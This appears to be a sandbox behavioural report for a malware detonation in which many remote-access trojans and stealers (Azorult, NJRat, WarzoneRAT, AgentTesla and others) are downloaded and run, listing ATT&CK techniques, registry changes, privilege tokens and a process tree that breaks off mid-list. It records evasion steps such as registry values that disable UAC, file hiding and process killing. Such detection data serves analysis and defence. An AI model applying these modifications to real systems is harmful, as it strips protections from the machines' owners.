Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5776	ipconfig.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
8364	taskkill.exe
8960	taskkill.exe
1052	taskkill.exe
3880	taskkill.exe
9136	taskkill.exe
5828	taskkill.exe
7680	taskkill.exe
4296	taskkill.exe
7524	taskkill.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Blackkomet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Blackkomet.exe
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3777591257-2471171023-3629228286-1000\{D2CE9EE2-B789-4B94-9A54-36164635CB4E}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Blackkomet.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1424	reg.exe
3508	reg.exe

NTFS ADS 39 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 772550.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult (3).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 621006.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 283891.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Remcos.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 575659.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 173111.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult (1).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 441356.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NJRat.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 964926.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:Zone.Identifier:$DATA	WarzoneRAT.exe
File created	C:\svchost\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult (2).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\CobaltStrike.doc:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NetWire.doc:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier	msedge.exe
File created	C:\svchost\svchost.exe\:SmartScreen:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\svchost.exe\:SmartScreen:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 465196.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WarzoneRAT.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 134602.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 238046.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:SmartScreen:$DATA	WarzoneRAT.exe
File opened for modification	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 623597.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\AgentTesla (2).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\AgentTesla (1).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 799686.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 374402.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 70457.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 250773.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

pid	Process
3844	regedit.exe
6276	regedit.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1196	PING.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5856	WINWORD.EXE
5856	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4668	msedge.exe
4668	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
2184	identity_helper.exe
2184	identity_helper.exe
1980	msedge.exe
1980	msedge.exe
1728	msedge.exe
1728	msedge.exe
1540	msedge.exe
1540	msedge.exe
4676	msedge.exe
4676	msedge.exe
1056	msedge.exe
1056	msedge.exe
1184	msedge.exe
1184	msedge.exe
2172	msedge.exe
2172	msedge.exe
5016	msedge.exe
5016	msedge.exe
1540	msedge.exe
1540	msedge.exe
3332	msedge.exe
3332	msedge.exe
4912	msedge.exe
4912	msedge.exe
4448	msedge.exe
4448	msedge.exe
4716	WarzoneRAT.exe
4716	WarzoneRAT.exe
4716	WarzoneRAT.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
1984	msedge.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe
4960	NJRat.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4740	msedge.exe
3864	Userdata.exe
2412	taskhostw.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
676	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs

pid	Process
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
7372	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4716	WarzoneRAT.exe
Token: SeDebugPrivilege	3768	RevengeRAT.exe
Token: SeDebugPrivilege	1420	RegSvcs.exe
Token: SeDebugPrivilege	4960	NJRat.exe
Token: SeIncreaseQuotaPrivilege	1852	Blackkomet.exe
Token: SeSecurityPrivilege	1852	Blackkomet.exe
Token: SeTakeOwnershipPrivilege	1852	Blackkomet.exe
Token: SeLoadDriverPrivilege	1852	Blackkomet.exe
Token: SeSystemProfilePrivilege	1852	Blackkomet.exe
Token: SeSystemtimePrivilege	1852	Blackkomet.exe
Token: SeProfSingleProcessPrivilege	1852	Blackkomet.exe
Token: SeIncBasePriorityPrivilege	1852	Blackkomet.exe
Token: SeCreatePagefilePrivilege	1852	Blackkomet.exe
Token: SeBackupPrivilege	1852	Blackkomet.exe
Token: SeRestorePrivilege	1852	Blackkomet.exe
Token: SeShutdownPrivilege	1852	Blackkomet.exe
Token: SeDebugPrivilege	1852	Blackkomet.exe
Token: SeSystemEnvironmentPrivilege	1852	Blackkomet.exe
Token: SeChangeNotifyPrivilege	1852	Blackkomet.exe
Token: SeRemoteShutdownPrivilege	1852	Blackkomet.exe
Token: SeUndockPrivilege	1852	Blackkomet.exe
Token: SeManageVolumePrivilege	1852	Blackkomet.exe
Token: SeImpersonatePrivilege	1852	Blackkomet.exe
Token: SeCreateGlobalPrivilege	1852	Blackkomet.exe
Token: 33	1852	Blackkomet.exe
Token: 34	1852	Blackkomet.exe
Token: 35	1852	Blackkomet.exe
Token: 36	1852	Blackkomet.exe
Token: 33	4960	NJRat.exe
Token: SeIncBasePriorityPrivilege	4960	NJRat.exe
Token: SeDebugPrivilege	5188	svchost.exe
Token: SeDebugPrivilege	5580	RegSvcs.exe
Token: SeIncreaseQuotaPrivilege	5212	Blackkomet.exe
Token: SeSecurityPrivilege	5212	Blackkomet.exe
Token: SeTakeOwnershipPrivilege	5212	Blackkomet.exe
Token: SeLoadDriverPrivilege	5212	Blackkomet.exe
Token: SeSystemProfilePrivilege	5212	Blackkomet.exe
Token: SeSystemtimePrivilege	5212	Blackkomet.exe
Token: SeProfSingleProcessPrivilege	5212	Blackkomet.exe
Token: SeIncBasePriorityPrivilege	5212	Blackkomet.exe
Token: SeCreatePagefilePrivilege	5212	Blackkomet.exe
Token: SeBackupPrivilege	5212	Blackkomet.exe
Token: SeRestorePrivilege	5212	Blackkomet.exe
Token: SeShutdownPrivilege	5212	Blackkomet.exe
Token: SeDebugPrivilege	5212	Blackkomet.exe
Token: SeSystemEnvironmentPrivilege	5212	Blackkomet.exe
Token: SeChangeNotifyPrivilege	5212	Blackkomet.exe
Token: SeRemoteShutdownPrivilege	5212	Blackkomet.exe
Token: SeUndockPrivilege	5212	Blackkomet.exe
Token: SeManageVolumePrivilege	5212	Blackkomet.exe
Token: SeImpersonatePrivilege	5212	Blackkomet.exe
Token: SeCreateGlobalPrivilege	5212	Blackkomet.exe
Token: 33	5212	Blackkomet.exe
Token: 34	5212	Blackkomet.exe
Token: 35	5212	Blackkomet.exe
Token: 36	5212	Blackkomet.exe
Token: 33	4960	NJRat.exe
Token: SeIncBasePriorityPrivilege	4960	NJRat.exe
Token: 33	4960	NJRat.exe
Token: SeIncBasePriorityPrivilege	4960	NJRat.exe
Token: SeIncreaseQuotaPrivilege	5676	Blackkomet.exe
Token: SeSecurityPrivilege	5676	Blackkomet.exe
Token: SeTakeOwnershipPrivilege	5676	Blackkomet.exe
Token: SeLoadDriverPrivilege	5676	Blackkomet.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe
4740	msedge.exe

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
3864	Userdata.exe
5856	WINWORD.EXE
5856	WINWORD.EXE
5856	WINWORD.EXE
5856	WINWORD.EXE
4740	msedge.exe
4740	msedge.exe
7600	AgentTesla (2).exe
8088	Azorult (3).exe
1212	wini.exe
6384	winit.exe
6528	cheat.exe
6720	taskhost.exe
1572	ink.exe
7820	rutserv.exe
7612	P.exe
7964	rutserv.exe
460	rutserv.exe
6124	rutserv.exe
8552	R8.exe
5488	winlogon.exe
2412	taskhostw.exe
8164	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4740 wrote to memory of 3584	4740	msedge.exe	85
PID 4740 wrote to memory of 3584	4740	msedge.exe	85
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 3280	4740	msedge.exe	86
PID 4740 wrote to memory of 4668	4740	msedge.exe	87
PID 4740 wrote to memory of 4668	4740	msedge.exe	87
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88
PID 4740 wrote to memory of 1484	4740	msedge.exe	88

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult (3).exe

Views/modifies file attributes 1 TTPs 12 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5904	attrib.exe
5988	attrib.exe
5224	attrib.exe
5140	attrib.exe
5304	attrib.exe
8692	attrib.exe
5940	attrib.exe
5688	attrib.exe
3368	attrib.exe
8860	attrib.exe
240	attrib.exe
7916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\advbattoexeconverter.exe
"C:\Users\Admin\AppData\Local\Temp\advbattoexeconverter.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:3556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff93c243cb8,0x7ff93c243cc8,0x7ff93c243cd8
  2⤵
  PID:3584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2
  2⤵
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
  2⤵
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
  2⤵
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
  2⤵
  PID:3712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4640 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4648 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:3772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
